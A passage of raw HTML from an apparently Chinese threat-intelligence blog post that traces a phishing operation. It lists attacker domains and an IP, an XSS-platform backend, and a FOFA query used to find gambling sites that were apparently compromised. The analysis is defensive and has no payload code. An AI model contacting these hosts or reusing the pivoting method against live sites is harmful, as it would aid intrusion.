0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate[.]net " target="_blank">https://sslupdate[.]net </a></span></code><span leaf=""> 被攻击者关闭，没记错的话攻击者当时连 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://47.239.5.111" target="_blank">https://47.239.5.111</a></span></code><span leaf=""> 一起关了，后来过了几天又偷偷把  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://47.239.5.111" target="_blank">https://47.239.5.111</a></span></code><span leaf="">  打开了，现在访问  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://47.239.5.111" target="_blank">https://47.239.5.111</a></span></code><span leaf=""> 仍然可以看到钓鱼页面。</span></p><p><img data-imgfileid="100001354" class="rich_pages wxw-img" data-ratio="0.5789473684210527" data-s="300,640" data-type="png" data-w="2394" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=15b4ee82&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8t2jlsWC87fibYicHNaiadFWh8AN9k1t7yhiaaLBia1y0LtkotFFLB9t7Hxw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">页面顶部包含一个 saved from 标记，</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">&lt;!-- saved from url=(0032)file:///Users/ok/Desktop/tt.html --&gt;</span></code><span leaf=""> ，说明这个页面是攻击者通过 EDGE 浏览器打开保存在桌面的html文件。</span><strong style="color: rgb(0, 0, 0);font-weight: bold;background-attachment: scroll;background-clip: border-box;background-color: rgba(0, 0, 0, 0);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgba(0, 0, 0, 0.4);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 0px;border-top-right-radius: 0px;border-bottom-right-radius: 0px;border-bottom-left-radius: 0px;"><span leaf="">很可惜，攻击者这次又没有暴露实名或者 ID。</span></strong></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">&lt;!-- saved from url xxx --&gt;</span></code><span leaf="">  这个特征本来是 IE 浏览器的特征，后来 EDGE 保留了这个特性，有时候这里可以追溯到一些信息。</span></p><p><img data-imgfileid="100001356" class="rich_pages wxw-img" data-ratio="0.19389978213507625" data-s="300,640" data-type="png" data-w="1836" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=8ab210e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ch5ibib2SVEsNuAvoDRVfy1CSomjSguUIPNUz09n2nXibLzv3S2I5a7QA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">另外这个页面当中还包含一个很有意思的域名信息：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">c.flash[.]ec</span></code><span leaf="">  ，域名算得上是靓号域名，不仔细很容易错过。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且出现在这个位置也很奇怪，也不太像是替换的时候出现了失误，不知道攻击者是出于什么操作把这个域名放在这里。</span></p><p><img data-imgfileid="100001358" class="rich_pages wxw-img" data-ratio="0.3360512521840419" data-s="300,640" data-type="png" data-w="3434" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=469afa16&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8mbLHJTSNib1OicJqbAu8qlms3iayzEszPa7FZ1I0icLzGNPDdNxFB9HkkA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">对这个域名进行拓线分析，发现所有域名都绑在 Cloudflare上，所以 IP 没什么参考价值。</span></p><p><img data-imgfileid="100001357" class="rich_pages wxw-img" data-ratio="0.30515297906602257" data-s="300,640" data-type="png" data-w="2484" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=aeba69fa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8c5aaFtwGc2YWFr6RayUD4CkO3ZoNLFuWTs6IHa6eoibZZdR4vcOWgibw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">先是 fox 发现 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">x.flash[.]ec</span></code><span leaf=""> 是一个 XSS 平台的后台，使用了开源的 </span><span leaf="">Onexss</span><span leaf="">。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">注意看这个 XSS 平台的 title 是  </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">FromXS </span></code><span leaf=""> ，当时没有留意这个细节，以为是默认的标题，后面它还会再出现。</span></p><p><img data-imgfileid="100001359" class="rich_pages wxw-img" data-ratio="0.5703324808184144" data-s="300,640" data-type="png" data-w="2346" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=64147a8f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8TicPqSq4tFoyibMrmCYfhqddsHznLOicZVtfPjCR8A1ZslKv6VCiamia5Bg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而真正让我又开始惊讶的是，fofa搜索 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">l.flash[.]ec</span></code><span leaf=""> 的结果是一大批菠菜网站。</span></p><p><img data-imgfileid="100001360" class="rich_pages wxw-img" data-ratio="0.4058469475494411" data-s="300,640" data-type="png" data-w="2326" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b3e7dbe4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8pPWqug41IzRE7WHZouHatQpWDN8J5QAX0ggeIkTWpUxrs10EJIcmiaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">由于flash的域名已经不解析了所以也无法拉取xss payload 回来了</span></p><p><img data-imgfileid="100001361" class="rich_pages wxw-img" data-ratio="0.4619516562220233" data-s="300,640" data-type="png" data-w="2234" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c385208a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8JzuJGh15KWLEYFib03WQIzmB5vbQ1wedAiciaUd7qzhG3aRehS4AaPUzA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">后面的数字编号 6647 可能代表着一个项目。</span></p><p><img data-imgfileid="100001362" class="rich_pages wxw-img" data-ratio="0.42144452717795977" data-s="300,640" data-type="png" data-w="2686" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=764e00a9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8pSKZKP1bQoz7BSA9Yia58WIuq8ia7hndFom3nTlmuFR5ueGuzzNdeRlg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜索 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">&#34;l.flash[.]ec&#34; &amp;&amp; body!=&#34;6647&#34;</span></code><span leaf=""> 可以发现其他项目。</span></p><p><img data-imgfileid="100001363" class="rich_pages wxw-img" data-ratio="0.5394736842105263" data-s="300,640" data-type="png" data-w="2280" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b33b2b12&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8BhMia5QEfibsjOx5CG7kDsXptv1VPRS8M33T6M5ArHX2eMHQicR1icPrYQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001364" class="rich_pages wxw-img" data-ratio="0.4910071942446043" data-s="300,640" data-type="png" data-w="2224" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fb554fae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8cuLaPpmtKPNvFpu5FnKibTacLoYVKlYLjSgYpz0ibhd8L9OeDuuoYHJw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">由于好几个后台的 URI 都是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">/public.login.do</span></code><span leaf=""> ，所以很像是一个漏洞打了一批同框架的后台。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是多翻几个又发现这些网站似乎也并不全是同一套源码。</span></p><p><img data-imgfileid="100001366" class="rich_pages wxw-img" data-ratio="0.3225806451612903" data-s="300,640" data-type="png" data-w="2232" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b94c3b33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8ZKL5Md6mVbEicsTCeGurzTrydqdR6RH6dIDbpP6SMrGyOjt0dwDoib2A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">搜索 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">web.flash[.]ec</span></code><span leaf=""> 有一个 flash.js，已经无法访问到了。</span></p><p><img data-imgfileid="100001365" class="rich_pages wxw-img" data-ratio="0.5207547169811321" data-s="300,640" data-type="png" data-w="2120" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=0901eee6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh86Mib8cNYhHHzvDoVpQLicSnSMIiaRftQQMSU4looAZC0o9ibKLGRp7HBDw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">v.flash[.]ec</span></code><span leaf="">  是一个basic认证页面。</span></p><p><img data-imgfileid="100001367" class="rich_pages wxw-img" data-ratio="0.41264266900790164" data-s="300,640" data-type="png" data-w="2278" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f2772619&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh82zAFBNicF4BZrqSgygTic0bw3eDSuXzBdcQlomc3vW1wvM7ZibGV52Lsw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">如果 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: 